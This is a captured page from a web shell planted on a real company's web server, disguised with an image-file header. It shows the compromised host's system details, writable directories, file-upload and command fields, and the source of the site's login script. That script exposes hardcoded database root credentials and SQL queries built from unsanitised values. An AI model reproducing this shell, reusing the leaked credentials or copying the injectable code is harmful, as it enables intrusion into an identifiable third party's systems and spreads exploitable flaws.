????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.117.8.11
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/logon.php
<?php 
if($_GET['action'] == "logon"){
	session_start();
	require_once("SSO/AstacusSSO.php");
	$sso = new AstacusSSO();
	$status = $sso->login($_POST['username'], $_POST['password']);


$SystemUserId = $_SESSION['ASTACUS_SSO_INFO'][0];
$GroupID = $_SESSION['ASTACUS_SSO_INFO'][3];

$CountryId  = $_SESSION['ASTACUS_SSO_INFO'][12];
	

	if($status == FALSE){
		header("Location: index.php?page=loggain&message=error1&goto=".$_POST['goto']);
	}else{
		require_once("flush.php");
	
		if($_POST['username'] == "icadadmin@astacus.se"){
			header("Location: admin/index.php");

		}else{
			if(($_SESSION['ASTACUS_SSO_INFO'][3] == "6" || $_SESSION['ASTACUS_SSO_INFO'][3] == "7" ) && $_POST['goto'] == "project"){
				header("Location: productionzon/index.php");
			}else{
				$link = mysql_connect ("localhost", "root", "root123");
				mysql_select_db ("vpa");
				
				$CustomerID = $_SESSION['ASTACUS_SSO_INFO'][4];
				$sql = "SELECT * FROM ICADAccount WHERE CustomerID = '$CustomerID'";
				
				$result = mysql_query($sql);
				$OK = false;
				while ($row = mysql_fetch_assoc($result)){ 
					$OK = true;
				}
				
				//if($OK == true){
					
					if($_POST['goto'] == "archive"){
						
						$sql = "SELECT * FROM ICADAccount WHERE CustomerID = '$CustomerID' and ICADTypeID = 14";
				
						$result = mysql_query($sql);
						$OK = false;
						while ($row = mysql_fetch_assoc($result)){ 
							$OK = true;
						}
						if($OK == true){
							header("Location: archive/index.php");
						}else{
							header("Location: index.php?page=loggain&message=error2&goto=".$_POST['goto']);
						}
					}else if($_POST['goto'] == "approject"){
						if($GroupID  == 4 || $GroupID  == 6  ||  $GroupID  == 7 ||  $GroupID  == 11 ||  $GroupID  == 12 ){
							header("Location: project/index.php");//?countryId=$CountryId");
						}else{
							header("Location: project/index.php?BallId=".$SystemUserId);//."&countryId=$CountryId");
						}
					}else {
						header("Location: customerzon/index.php");
					}
					
				/*}else{
					header("Location: index.php?page=loggain&message=error10&goto=".$_POST['goto']);
				}*/
			}
		}
	}
}
	

?>

Youez - 2016 - github.com/yon3zu
LinuXploit